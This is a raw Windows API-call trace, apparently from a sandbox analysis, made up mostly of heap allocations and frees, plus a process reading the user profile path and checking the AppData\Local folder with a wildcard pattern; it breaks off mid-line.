RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0242.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0242.540] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3e0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0242.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0242.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0242.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0242.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e58910 [0242.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0242.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0242.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0242.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0242.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0242.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506b0 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0242.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0242.542] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0242.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0242.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0242.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0242.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0242.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9e0 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0242.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0242.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0242.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0242.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0242.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0242.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0242.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0242.543] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0242.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0242.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9) returned 0x2e50f80 [0242.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2e50f80, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0242.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0242.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e564e0 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0242.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy/AppData/Local", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1e) returned 0x2e7f9b8 [0242.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy/AppData/Local", cchWideChar=30, lpMultiByteStr=0x2e7f9b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy/AppData/Local", lpUsedDefaultChar=0x0) returned 30 [0242.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa08 [0242.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3c) returned 0x2e78a50 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0242.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0242.545] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e7f9b8, cbMultiByte=30, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3c) returned 0x2e78858 [0242.545] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e7f9b8, cbMultiByte=30, lpWideCharStr=0x2e78858, cchWideChar=30 | out: lpWideCharStr="C:\\Users\\FD1HVy/AppData/Local") returned 30 [0242.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0242.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0242.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0242.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa08 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0242.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0242.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0242.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e564e0 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0242.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0242.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0242.547] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0242.547] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local\\" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0242.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0242.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0242.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0242.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.547] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0242.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0242.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0242.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0242.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e698c8 [0242.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x2e698c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0242.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa30 [0242.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x59) returned 0x2e56568 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0242.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0242.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2e54d18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0242.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0242.549] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0242.549] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0242.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.549] RtlAllocateHeap 